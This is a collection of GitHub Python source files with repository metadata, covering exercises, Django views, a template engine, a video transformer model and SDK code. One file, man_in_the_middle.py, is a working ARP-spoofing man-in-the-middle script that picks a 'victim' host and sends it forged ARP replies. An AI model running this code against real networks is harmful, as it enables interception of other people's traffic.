29d68c117848a99093caea9576f255c3fd233bb3
|
c7fc1265dd09cae456c978c09643811bf3aa89d7
|
/mileage_cal.py
|
722bfc599c73d4858c72caed5ac2bbc36aa3fabd
|
[] |
no_license
|
chandraprakashh/Data_Handling
|
e136c6bc188506ca6660becd434d5a17bed8e199
|
59f43288dea379f8fe0bb0fe01b17d0e5e99e057
|
refs/heads/master
| 2020-07-18T18:11:25.908312 | 2020-01-13T10:24:51 | 2020-01-13T10:24:51 | 206,290,142 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 566 |
py
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
"""
1.Code Challenge
Name:
Gas Mileage Calculator
Filename:
mileage_cal.py
Problem Statement:
Assume my car travels 100 Kilometres after putting 5 litres of fuel.
Calculate the average of my car.
Hint:
Divide kilmeters by the litres used to get the average
"""
#car travels 100 Kilometres
distance = 100
#putting 5 litres of fuel
fuel= 5
#average
average= distance/fuel
print("avreage my car ={}".format(average))
|
[
"[email protected]"
] | |
4abd4f456948302874dfdc97f41babf31670d96a
|
4786fe9537fbcb50b7490f7f95624e9c8589801f
|
/ex21a.py
|
b80932994d975a1f5b8f8cfd3bbc785b73fc603b
|
[] |
no_license
|
dbialon/LPTHW
|
075e5a82c541dd277ee30f5ebbc221e30c63e29e
|
3e6674cded2bcd90d4a098efd00a71abeb33bdc5
|
refs/heads/master
| 2022-06-07T02:14:18.180807 | 2020-05-02T13:30:52 | 2020-05-02T13:30:52 | 259,911,016 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 723 |
py
|
def add(a, b):
print(f"ADDING {a} + {b}")
return a + b
def subtract(a, b):
print(f"SUBTRACTING {a} - {b}")
return a - b
def multiply(a, b):
print(f"MULTIPLYING {a} * {b}")
return a * b
def divide(a, b):
print(f"DIVIDING {a} / {b}")
return a / b
print("""
This programm will execute the following calculation:
(A - B) / C * D + E
""")
varA = float(input("What is your A? --- "))
varB = float(input("What is your B? --- "))
varC = float(input("What is your C? --- "))
varD = float(input("What is your D? --- "))
varE = float(input("What is your E? --- "))
print()
result = add(multiply(divide(subtract(varA, varB), varC), varD), varE)
print("\nThat becomes:", result)
|
[
"[email protected]"
] | |
8f45532721df9ce375e512eac8e8b5d2f48bbfcc
|
fe2eef159f7e75b6a3b4ecbacab53a19df33b8eb
|
/setup.py
|
3c3eff7248dd676186f2778a2b4149610c6dc6e0
|
[
"MIT"
] |
permissive
|
a1fred/django-model-render
|
6b9572ff26ced93e6de0aa15ac97fef1217ebeba
|
0912b2ec9d33bada8875a57f7af9eb18d24e1e84
|
refs/heads/master
| 2020-09-12T19:23:57.847976 | 2017-01-02T20:49:20 | 2017-01-02T20:49:20 | 32,887,644 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,077 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from setuptools import setup
requirements = [
'django>=1.4',
]
setup(
name='django-model-render',
version='0.5',
description='Django models extension that allows define default model templates',
author='a1fred',
author_email='[email protected]',
license='MIT',
url='https://github.com/a1fred/django-model-render',
packages=['model_render'],
test_suite="runtests",
platforms=['any'],
zip_safe=False,
install_requires=requirements,
tests_require=requirements,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Unix',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
|
[
"[email protected]"
] | |
c174a2e44b99cb6349ff944069b1b602555b46c7
|
892c35f72f46f145c3f3860c1c29f1f4503ef9a6
|
/search/search.py
|
fb2fa2520ad49d842fb5e069fbe0011cfdf4eb90
|
[] |
no_license
|
pymmrd/tuangou
|
aaa2b857e352f75f2ba0aa024d2880a6adac21a8
|
8f6a35dde214e809cdd6cbfebd8d913bafd68fb2
|
refs/heads/master
| 2021-01-10T20:31:55.238764 | 2013-11-13T13:53:53 | 2013-11-13T13:53:53 | 7,911,285 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,244 |
py
|
import re
import string
from django.db.models import Q
from django.conf import settings
from tuangou.search.models import SearchTerm
from tuangou.stats.utils import stats
from tuangou.utils.location import get_current_city
def store(request, q):
#if search term is at least three chars long, store in db
if len(q) >= 2:
tracking_id = stats.tracking_id(request)
terms = SearchTerm.objects.filter(tracking_id=tracking_id, q=q).count()
if not terms:
term = SearchTerm()
term.q = q
term.tracking_id = stats.tracking_id(request)
term.ip_address = request.META.get('REMOTE_ADDR')
term.user = None
if request.user.is_authenticated():
term.user = request.user
term.save()
# get deals matching the search text
def deals(request, search_text):
from tuangou.guider.models import ReDeal
city = request.session.get('city', None)
deals = ReDeal.nonexpires.all()
results = {}
results['deals'] = {}
for word in search_text:
deals = deals.filter(Q(title__contains=word)|
Q(division__name__contains=word))
results['deals'] = deals[:settings.DEAL_PER_ROW]
return results
|
[
"zg163@zg163-Lenovo-IdeaPad-Y470.(none)"
] |
zg163@zg163-Lenovo-IdeaPad-Y470.(none)
|
326f5de126d44ed5c242cb25b5cef8c4788a9c97
|
fffcc24d7c3fbadd615db1c2de632ebec72b92da
|
/cgi-bin/simpletemplate.py
|
3551d703604abe395986350f77e0ad80b887ef96
|
[] |
no_license
|
kimihito/minpy
|
35a5cf1596979e3bc57d6bfb6fcded03ae10f0d3
|
6273d43f65279d800a37a5dd9b34488d2cea54a1
|
refs/heads/master
| 2016-08-08T02:10:02.967527 | 2012-06-11T13:57:23 | 2012-06-11T13:57:23 | 4,147,292 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,517 |
py
|
#!/usr/bin/env python
# coding: utf-8
import re
if_pat=re.compile(r"\$if\s+(.*\:)")
endif_pat=re.compile(r"\$endif")
for_pat=re.compile(r"\$for\s+(.*)\s+in\s+(.*\:)")
endfor_pat=re.compile(r"\$endfor")
value_pat=re.compile(r"\${(.+?)}")
class SimpleTemplate(object):
"""
シンプルな機能を持つテンプレートエンジン
"""
def __init__(self, body='', file_path=None):
"""
初期化メソッド
"""
if file_path:
f=open(file_path)
body=unicode(f.read(), 'utf-8', 'ignore')
body=body.replace('\r\n', '\n')
self.lines = body.split('\n')
self.sentences = ((if_pat, self.handle_if),
(for_pat, self.handle_for),
(value_pat, self.handle_value),)
def render(self, kws={}):
"""
テンプレートをレンダリングする
"""
l, o=self.process(kws=kws)
return o
def find_matchline(self, pat, start_line=0):
"""
正規表現を受け取り,マッチする行の行数を返す
"""
cur_line=start_line
for line in self.lines[start_line:]:
if pat.search(line):
return cur_line
cur_line+=1
return -1
def process(self, exit_pats=(), start_line=0, kws={}):
"""
テンプレートのレンダリング処理をする
"""
output=u''
cur_line=start_line
while len(self.lines) > cur_line:
line=self.lines[cur_line]
for exit_pat in exit_pats:
if exit_pat.search(line):
return cur_line+1, output
for pat, handler in self.sentences:
m=pat.search(line)
pattern_found=False
if m:
try:
cur_line, out=handler(m, cur_line, kws)
pattern_found=True
output+=out
break
except Exception, e:
raise e #Exception("Following error occured in line %d\n%s" % (cur_line, str(e)))
if not pattern_found:
output+=line+'\n'
cur_line+=1
if exit_pats:
raise "End of lines while parsing"
return cur_line, output
def handle_value(self, _match, _line_no, _kws={}):
"""
${...}を処理する
"""
_line=self.lines[_line_no]
_rep=[]
locals().update(_kws)
pos=0
while True:
_m=value_pat.search(_line[pos:])
if not _m:
break
pos+=_m.end()
_rep.append( (_m.group(1), unicode(eval(_m.group(1)))) )
for t, r in _rep:
_line=_line.replace('${%s}'%t, r)
return _line_no, _line+'\n'
def handle_if(self, _match, _line_no, _kws={}):
"""
$ifを処理する
"""
_cond=_match.group(1)
if not _cond:
raise "SyntaxError: invalid syntax in line %d" % line_no
_cond=_cond[:-1]
locals().update(_kws)
_line, _out=self.process((endif_pat, ), _line_no+1, _kws)
if not eval(_cond):
_out=''
return _line-1, _out
def handle_for(self, _match, _line_no, _kws={}):
"""
$forを処理する
"""
_var=_match.group(1)
_exp=_match.group(2)
if not _var or not _exp:
raise "SyntaxError: invalid syntax in line %d" % line_no
locals().update(_kws)
_seq=eval(_exp[:-1])
_out=''
if not _seq:
return self.find_matchline(endfor_pat, _line_no), _out
for _v in _seq:
_kws.update({_var:_v})
_line, _single_out=self.process((endfor_pat, ), _line_no+1, _kws)
_out+=_single_out
return _line-1, _out
def main():
t=SimpleTemplate("""aaaa
$if 1==1:
if clause0
$endif
$if 1==1:
if clause1
$if 1==1:
if clause1-2
$endif
$else:
else clause1
$endif
$if 1==1:
if clause2
$endif
$if 1==2:
if clause3
$else:
else clause3
$endif
bbbb
""")
print t.render()
print "-"*40
t=SimpleTemplate("""
<select name="fruit">
$for val in ["Apple", "Banana", "Melon"]:
<optioin value="${val}">${val}</option>
$endfor
</select>
""")
print t.render()
if __name__=='__main__':
"""
import pdb
pdb.run('main()')
"""
main()
|
[
"[email protected]"
] | |
7f329a56f3c63d6f634c341fe1ee1a609f562304
|
eef39fd96ef4ed289c1567f56fde936d5bc42ea4
|
/BaekJoon/Bronze2/15969.py
|
803573cbb6d19798b9968fcd14d2be7454bafc32
|
[] |
no_license
|
dudwns9331/PythonStudy
|
3e17da9417507da6a17744c72835c7c2febd4d2e
|
b99b9ef2453af405daadc6fbf585bb880d7652e1
|
refs/heads/master
| 2023-06-15T12:19:56.019844 | 2021-07-15T08:46:10 | 2021-07-15T08:46:10 | 324,196,430 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,452 |
py
|
# 행복
"""
2021-01-22 오전 1:37
안영준
문제
코이 초등학교에 새로 부임하신 교장 선생님은 어린 학생들의 행복감과 학생들의 성적 차이 관계를 알아보기로 했다.
그래서 이전 성적을 조사하여 학생 들의 시험 점수 차이 변화를 알아보려고 한다.
예를 들어서 2016년 학생 8명의 점수가 다음과 같다고 하자.
27, 35, 92, 75, 42, 53, 29, 87
그러면 가장 높은 점수는 92점이고 가장 낮은 점수는 27점이므로 점수의 최대 차이는 65이다.
한편 2017년 학생 8명의 점수가 다음과 같았다.
85, 42, 79, 95, 37, 11, 72, 32
이때 가장 높은 점수는 95점이고 가장 낮은 점수는 11점이므로 점수의 최대 차이는 84이다.
N명 학생들의 점수가 주어졌을 때, 가장 높은 점수와 가장 낮은 점수의 차이를 구하는 프로그램을 작성하시오.
입력
표준 입력으로 다음 정보가 주어진다. 첫 번째 줄에는 학생 수 N이 주어진다. 다음 줄에는 N명의 학생 점수가 공백 하나를 사이에 두고 주어진다.
출력
표준 출력으로 가장 높은 점수와 가장 낮은 점수의 차이를 출력한다.
제한
모든 서브태스크에서 2 ≤ N ≤ 1,000이고 입력되는 학생들의 점수는 0 이상 1,000 이하의 정수이다.
"""
N = int(input())
score = list(map(int, input().split()))
score.sort()
print(score[-1] - score[0])
|
[
"[email protected]"
] | |
d830da1f9d9e07fe504090cca4bc6f96ec19b136
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/response/SsdataDataserviceRiskAntifraudscoreQueryResponse.py
|
eb88453a0ac5e908d0040c632adda75bafe8c3cc
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 |
Apache-2.0
| 2023-04-25T04:54:02 | 2018-05-14T09:40:54 |
Python
|
UTF-8
|
Python
| false | false | 1,247 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class SsdataDataserviceRiskAntifraudscoreQueryResponse(AlipayResponse):
def __init__(self):
super(SsdataDataserviceRiskAntifraudscoreQueryResponse, self).__init__()
self._biz_no = None
self._score = None
self._unique_id = None
@property
def biz_no(self):
return self._biz_no
@biz_no.setter
def biz_no(self, value):
self._biz_no = value
@property
def score(self):
return self._score
@score.setter
def score(self, value):
self._score = value
@property
def unique_id(self):
return self._unique_id
@unique_id.setter
def unique_id(self, value):
self._unique_id = value
def parse_response_content(self, response_content):
response = super(SsdataDataserviceRiskAntifraudscoreQueryResponse, self).parse_response_content(response_content)
if 'biz_no' in response:
self.biz_no = response['biz_no']
if 'score' in response:
self.score = response['score']
if 'unique_id' in response:
self.unique_id = response['unique_id']
|
[
"[email protected]"
] | |
675dda5c8c83bf0f987ede0d78116c521d6932a4
|
a6c0bb39fe1f5218094f9d8a728d32c7348414b8
|
/timesformer_pytorch/timesformer_pytorch.py
|
dfbbfbb447de3d906549636f03dc5833d4f4c0ce
|
[
"MIT"
] |
permissive
|
Willforcv/TimeSformer-pytorch
|
042f23cd4e02e973fc0374579f18a4b529309edb
|
4e4a60d4876a45cceddcf8af514eb39eac40ff96
|
refs/heads/main
| 2023-03-20T16:54:42.934377 | 2021-03-21T19:14:02 | 2021-03-21T19:14:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,494 |
py
|
import torch
from torch import nn, einsum
import torch.nn.functional as F
from einops import rearrange, repeat
# classes
class RMSNorm(nn.Module):
def __init__(self, dim, eps = 1e-8):
super().__init__()
self.scale = dim ** -0.5
self.eps = eps
self.g = nn.Parameter(torch.ones(1))
def forward(self, x):
norm = torch.norm(x, dim = -1, keepdim = True) * self.scale
return x / norm.clamp(min = self.eps) * self.g
class PreNorm(nn.Module):
def __init__(self, dim, fn):
super().__init__()
self.fn = fn
self.norm = RMSNorm(dim)
def forward(self, x, *args, **kwargs):
x = self.norm(x)
return self.fn(x, *args, **kwargs)
# feedforward
class GEGLU(nn.Module):
def forward(self, x):
x, gates = x.chunk(2, dim = -1)
return x * F.gelu(gates)
class FeedForward(nn.Module):
def __init__(self, dim, mult = 4, dropout = 0.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, dim * mult * 2),
GEGLU(),
nn.Dropout(dropout),
nn.Linear(dim * mult, dim)
)
def forward(self, x):
return self.net(x)
# attention
def attn(q, k, v):
sim = einsum('b i d, b j d -> b i j', q, k)
attn = sim.softmax(dim = -1)
out = einsum('b i j, b j d -> b i d', attn, v)
return out
class Attention(nn.Module):
def __init__(
self,
dim,
dim_head = 64,
heads = 8,
dropout = 0.
):
super().__init__()
self.heads = heads
self.scale = dim_head ** -0.5
inner_dim = dim_head * heads
self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False)
self.to_out = nn.Sequential(
nn.Linear(inner_dim, dim),
nn.Dropout(dropout)
)
def forward(self, x, einops_from, einops_to, **einops_dims):
h = self.heads
q, k, v = self.to_qkv(x).chunk(3, dim = -1)
q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> (b h) n d', h = h), (q, k, v))
q *= self.scale
# splice out classification token at index 1
(cls_q, q_), (cls_k, k_), (cls_v, v_) = map(lambda t: (t[:, 0:1], t[:, 1:]), (q, k, v))
# let classification token attend to key / values of all patches across time and space
cls_out = attn(cls_q, k, v)
# rearrange across time or space
q_, k_, v_ = map(lambda t: rearrange(t, f'{einops_from} -> {einops_to}', **einops_dims), (q_, k_, v_))
# expand cls token keys and values across time or space and concat
r = q_.shape[0] // cls_k.shape[0]
cls_k, cls_v = map(lambda t: repeat(t, 'b () d -> (b r) () d', r = r), (cls_k, cls_v))
k_ = torch.cat((cls_k, k_), dim = 1)
v_ = torch.cat((cls_v, v_), dim = 1)
# attention
out = attn(q_, k_, v_)
# merge back time or space
out = rearrange(out, f'{einops_to} -> {einops_from}', **einops_dims)
# concat back the cls token
out = torch.cat((cls_out, out), dim = 1)
# merge back the heads
out = rearrange(out, '(b h) n d -> b n (h d)', h = h)
# combine heads out
return self.to_out(out)
# main classes
class TimeSformer(nn.Module):
def __init__(
self,
*,
dim,
num_frames,
num_classes,
image_size = 224,
patch_size = 16,
channels = 3,
depth = 12,
heads = 8,
dim_head = 64,
attn_dropout = 0.,
ff_dropout = 0.
):
super().__init__()
assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.'
num_patches = (image_size // patch_size) ** 2
num_positions = num_frames * num_patches
patch_dim = channels * patch_size ** 2
self.patch_size = patch_size
self.to_patch_embedding = nn.Linear(patch_dim, dim)
self.pos_emb = nn.Embedding(num_positions + 1, dim)
self.cls_token = nn.Parameter(torch.randn(1, dim))
self.layers = nn.ModuleList([])
for _ in range(depth):
self.layers.append(nn.ModuleList([
PreNorm(dim, Attention(dim, dim_head = dim_head, heads = heads, dropout = attn_dropout)),
PreNorm(dim, Attention(dim, dim_head = dim_head, heads = heads, dropout = attn_dropout)),
PreNorm(dim, FeedForward(dim, dropout = ff_dropout))
]))
self.to_out = nn.Sequential(
RMSNorm(dim),
nn.Linear(dim, num_classes)
)
def forward(self, video):
b, f, _, h, w, *_, device, p = *video.shape, video.device, self.patch_size
assert h % p == 0 and w % p == 0, f'height {h} and width {w} of video must be divisible by the patch size {p}'
n = (h // p) * (w // p)
video = rearrange(video, 'b f c (h p1) (w p2) -> b (f h w) (p1 p2 c)', p1 = p, p2 = p)
tokens = self.to_patch_embedding(video)
cls_token = repeat(self.cls_token, 'n d -> b n d', b = b)
x = torch.cat((cls_token, tokens), dim = 1)
x += self.pos_emb(torch.arange(x.shape[1], device = device))
for (time_attn, spatial_attn, ff) in self.layers:
x = time_attn(x, 'b (f n) d', '(b n) f d', n = n) + x
x = spatial_attn(x, 'b (f n) d', '(b f) n d', f = f) + x
x = ff(x) + x
cls_token = x[:, 0]
return self.to_out(cls_token)
|
[
"[email protected]"
] | |
c8aa130be7fae098e4c52b4cee2c663da7e8857d
|
50ba981bc65efea92f61c698cecfbbe3214a724e
|
/Django_DB_Backup/App/views.py
|
f634d2abf55cd3aa4e2af403c7b5c2c6d7ea4e24
|
[] |
no_license
|
shubhamjain31/demorepo
|
ff0a4283fc866ea94df1c340da430271daf93cb6
|
90639b8622e68155ff19bfec0bb6925b421f04cf
|
refs/heads/master
| 2023-04-27T03:42:10.057387 | 2022-06-28T06:14:44 | 2022-06-28T06:14:44 | 229,792,545 | 1 | 0 | null | 2023-04-21T21:36:24 | 2019-12-23T17:04:22 |
Python
|
UTF-8
|
Python
| false | false | 2,012 |
py
|
from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
from itertools import chain
from django.contrib.auth.models import User
from django.views.decorators.csrf import csrf_exempt
from django.core import serializers
from django.contrib.admin.utils import NestedObjects
from django.core.management import call_command
import re
from App.models import *
# Create your views here.
def index(request):
return render(request, 'index.html')
def dbtable(request):
all_users = User.objects.all()
params = {'all_users':all_users}
return render(request, 'backupandrestore.html', params)
@csrf_exempt
def create_backup(request):
_pk = request.POST.get('_id')
# user object
user_obj = User.objects.get(pk=_pk)
# NestedObjects is admin contrib package which is used as a Collector subclass.
collector = NestedObjects(using="default") # database name
# create an object of NestedObjects
collector.collect([user_obj])
# create a list of all objects of all tables with foreign keys
objects = list(chain.from_iterable(collector.data.values()))
# store a data in file
with open("dbfiles/{}.json".format(user_obj.username), "w") as f:
s = serializers.serialize("json", objects, use_natural_foreign_keys=True, use_natural_primary_keys=True, indent = 4)
# make all tables objects pks null
# s = re.sub('"pk": [0-9]{1,5}', '"pk": null', s)
f.write(s)
data = {
'msg': 'Backup Created Successfully'
}
return JsonResponse(data)
@csrf_exempt
def restore_backup(request):
_pk = request.POST.get('_id')
# user object
user_obj = User.objects.get(pk=_pk)
# delete all relation of user object
Post.objects.filter(author=user_obj).delete()
Description.objects.filter(post_desc=user_obj).delete()
# file name
filename = "dbfiles/{}.json".format(user_obj.username)
# use call command for restore a data
call_command('loaddata', '{}'.format(filename))
data = {
'msg': 'Restore Backup Successfully'
}
return JsonResponse(data)
|
[
"[email protected]"
] | |
29f5a4ba9b7219b748f52e07f89157085e7a71a9
|
60c39402b6c957e5dfae0c63b5d7af13d9ba9350
|
/man_in_the_middle.py
|
8bd0947f1e8e9f0ddc3b0bb140e90309fd35c323
|
[] |
no_license
|
palex88/deauth
|
91747ac1a0143c7601351ebdd874b5e748380d06
|
70365da4841b75d46223cb84aa154705aa482fdb
|
refs/heads/master
| 2020-03-10T23:39:30.274222 | 2018-05-07T05:38:47 | 2018-05-07T05:38:47 | 129,645,384 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,989 |
py
|
# !usr/bin/env/python
#
# File: man_in_the_middle.py
# Author: Alex Thompson
# Github: [email protected]
# Python Version: 2.7
# Purpose: This script runs a man in the middle attack. It finds the local network IP and MAC addresses, then displays
# to the user all the devices connected to the network. Once the user chooses one of them, the script uses
# scapy to send packets to the AP and the chosen host to route traffic between the AP and the host through
# the machine the script is running on.
#
# Usage: python man_in_the_middle.py
#
# Input: None
# Output: None
#
# Resources:
# https://scapy.readthedocs.io/en/latest/usage.html?highlight=srp
# https://github.com/hotzenklotz/WhoIsHome/blob/master/whoIsHome.py
# https://github.com/glebpro/Man-in-the-Middle/blob/master/m.py
# https://null-byte.wonderhowto.com/how-to/build-man-middle-tool-with-scapy-and-python-0163525/
#
import os
import sys
import time
import socket
import subprocess32
import nmap
from scapy import *
from scapy import all
def scan():
"""
Scans for hosts on a local network and returns hosts IP and MAC addresses.
Return:
Dict with IP and MAC address for all hosts.
"""
host_list = str(get_lan_ip()) + "/24"
nmap_args = "-sn"
scanner = nmap.PortScanner()
scanner.scan(hosts=host_list, arguments=nmap_args)
host_list = []
for ip in scanner.all_hosts():
host = {"ip" : ip}
if "hostname" in scanner[ip]:
host["hostname"] = scanner[ip]["hostname"]
if "mac" in scanner[ip]["addresses"]:
host["mac"] = scanner[ip]["addresses"]["mac"].upper()
host_list.append(host)
return host_list
def get_lan_ip():
"""
Scans for local IP addresses on the local network.
"""
try:
return ([(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close())
for s in [socket.socket(socket.AF_INET,socket.SOCK_DGRAM)]][0][1])
except socket.error as e:
sys.stderr.write(str(e) + "\n")
sys.exit(e.errno)
def get_local_network_addr():
"""
Get local network IP and MAC address.
"""
proc = subprocess32.Popen(["arp", "-a"], stdout=subprocess32.PIPE)
output = proc.stdout.read().split()
out_ip = output[1]
out_mac = output[3]
return_dict = {"ip": out_ip, "mac": out_mac}
return return_dict
def set_ip_forwarding(toggle):
if toggle:
print("Turing on IP forwarding:")
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
if not toggle:
print("Turing off IP forwarding:")
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
def reassign_arp(victim_ip, victim_mac, router_ip, router_mac, interface):
"""
Function notifies the AP and the host to start connecting to each other again.
:param victim_ip:
:param victim_mac:
:param router_ip:
:param router_mac:
:param interface:
:return:
"""
print("Reassigning ARP tables:")
# send ARP request to router as-if from victim to connect,
# do it 7 times to be sure
all.send(all.ARP(op=2, pdst=router_ip, psrc=victim_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victim_mac), count=7)
# send ARP request to victim as-if from router to connect
# do it 7 times to be sure
all.send(all.ARP(op=2, pdst=victim_ip, psrc=router_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=router_mac), count=7)
set_ip_forwarding(False)
def attack(victim_ip, victim_mac, router_ip, router_mac):
"""
Performs the MitM attack on the victim.
:param victim_ip:
:param victim_mac:
:param router_ip:
:param router_mac:
:return:
"""
all.send(all.ARP(op=2, pdst=victim_ip, psrc=router_ip, hwdst=victim_mac))
all.send(all.ARP(op=2, pdst=router_ip, psrc=victim_ip, hwdst=router_mac))
if __name__ == '__main__':
subprocess32.call("airmon-ng")
interface = raw_input("Enter wireless interface to use: ")
set_ip_forwarding(True)
hosts = scan()
num = 1
all_hosts = {}
for host in hosts:
if host.has_key("ip") and host.has_key("mac"):
all_hosts[str(num)] = host
print str(num) + " IP: " + host["ip"] + " MAC: " + host["mac"]
num += 1
host_id = raw_input("Enter the host ID to attack: ")
victim_ip = all_hosts[host_id]["ip"]
victim_mac = all_hosts[host_id]["mac"]
addr = get_local_network_addr()
router_ip = addr["ip"].replace("(", "").replace(")", "")
router_mac = addr["mac"].upper()
print "Router - IP: " + router_ip + " MAC: " + router_mac
print "Victim - IP: " + victim_ip + " MAC: " + victim_mac
while True:
try:
attack(victim_ip, victim_mac, router_ip, router_mac)
time.sleep(1.5)
except KeyboardInterrupt:
reassign_arp(victim_ip, victim_mac, router_ip, router_mac, interface)
break
sys.exit(1)
|
[
"[email protected]"
] | |
26bc1342180ebbe498f0c43171c93b41246741b6
|
8f4c691f190a1d4ffd4261ea6dca6a2d3a96284c
|
/csa/csa/doctype/coach/test_coach.py
|
0237f9215f3d3c946814d85ca059dd549fb3f4eb
|
[
"MIT"
] |
permissive
|
Jishnu70055/usermanagement
|
57abb738160fb213acdc2c71b40244eae4b06cee
|
f7b526335c2b99899afac188696071fa35df09ca
|
refs/heads/master
| 2023-09-03T17:30:50.147750 | 2021-10-21T13:27:38 | 2021-10-21T13:27:38 | 399,362,509 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 135 |
py
|
# Copyright (c) 2021, s and Contributors
# See license.txt
# import frappe
import unittest
class TestCoach(unittest.TestCase):
pass
|
[
"[email protected]"
] | |
b2253842a0e9b8288ac8ee0d30df524f7b9ba0b0
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/045_functions/011_function_introspection/_exercises/inspect — Inspect Live Objects/017_inspect_getclasstree_unique.py
|
ebbf5718b636badc01d294b99ee8331e6cc56fb7
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 |
Python
|
UTF-8
|
Python
| false | false | 159 |
py
|
# ______ i....
# ______ example
# f... inspect_getclasstree _______ 0
#
# print_class_tree(i___.getclasstree(
# |ex___.A ex____.B C D|
# u..._T...
# ))
|
[
"[email protected]"
] | |
fbe3f086830981b67b0ff4d35dbfd848f1e762ad
|
9c4828f1caf252c49c16ee7c5d73353f7b820785
|
/EducationaldataofBD/venv/main.py
|
7ab1dbbc43bcb8d95d50371d680f2e2c8d018812
|
[] |
no_license
|
pronob1010/Data_Science_Project_with_Edu_data
|
44459dd3d27f5fcba4f7a810671fe0e2e481b6c1
|
a4c6d1ac430f332eff5435318c86e82e70e7d765
|
refs/heads/master
| 2022-12-26T12:08:59.221010 | 2020-10-08T15:14:43 | 2020-10-08T15:14:43 | 298,825,261 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,142 |
py
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import csv
country = pd.read_csv('C:\\Users\\prono\\PycharmProjects\\EducationaldataofBD\\venv\\dataset1.csv')
df = country.head(5900)
df = df.set_index(["EIIN"])
sd = df.reindex(columns=['DIVISION','INSTITUTE_TYPE','DISTRICT'])
print(sd)
print("----------------------------------------------------------------")
print("INSTITUTE_TYPE")
print("----------------------------------------------------------------")
INSTITUTE_TYPE = pd.value_counts(country['INSTITUTE_TYPE'])
print(INSTITUTE_TYPE)
print("----------------------------------------------------------------")
print("DIVISION")
print("----------------------------------------------------------------")
DIVISION = pd.value_counts(country['DIVISION'])
print(DIVISION)
print("----------------------------------------------------------------")
print("THANA")
print("----------------------------------------------------------------")
THANA = pd.value_counts(country['THANA'])
print(THANA)
print("----------------------------------------------------------------")
print("AREA_STATUS")
print("----------------------------------------------------------------")
AREA_STATUS = pd.value_counts(country['AREA_STATUS'])
print(AREA_STATUS)
print("----------------------------------------------------------------")
print("MPO_STATUS")
print("----------------------------------------------------------------")
MPO_STATUS= pd.value_counts(country['MPO_STATUS'])
print(MPO_STATUS)
print("----------------------------------------------------------------")
print("EDUCATION_LEVEL")
print("----------------------------------------------------------------")
EDUCATION_LEVEL = pd.value_counts(country['EDUCATION_LEVEL'])
print(EDUCATION_LEVEL)
print("----------------------------------------------------------------")
print("MANAGEMENT_TYPE")
print("----------------------------------------------------------------")
MANAGEMENT_TYPE = pd.value_counts(country['MANAGEMENT_TYPE'])
print(MANAGEMENT_TYPE)
print("-------------------------------------------------------------------------------------------------------------------------")
|
[
"[email protected]"
] | |
106d49eb14aff65452fe4cd74937e87eeea8b07e
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/115_testing/examples/Github/_Level_1/unittest-testsuite-example-master/app/foo_tests.py
|
d884126e6c468ffaf2c16c987e6331bddcc6897e
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 |
Python
|
UTF-8
|
Python
| false | false | 268 |
py
|
# -*- coding: utf-8 -*-
import unittest
import foo
class TestFoo(unittest.TestCase):
def setUp(self):
self.FOO = foo.Foo()
def test_foo(self):
self.assertEqual(self.FOO.foo(),'foo')
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
ef7be56fb5d9456857d6f97b035f6216b0f4c322
|
6f8906230f03d4d3616e7ad04d7a54c2e55fb3e8
|
/profiles/migrations/0007_auto_20210201_1849.py
|
e1dc6a7fbb5379afc379eedc29eeb1f079b92e0b
|
[] |
no_license
|
sanidhyaagrawal/tergum-shared
|
8c45d95cb3510dc72f787c92fef4951c341ccc4c
|
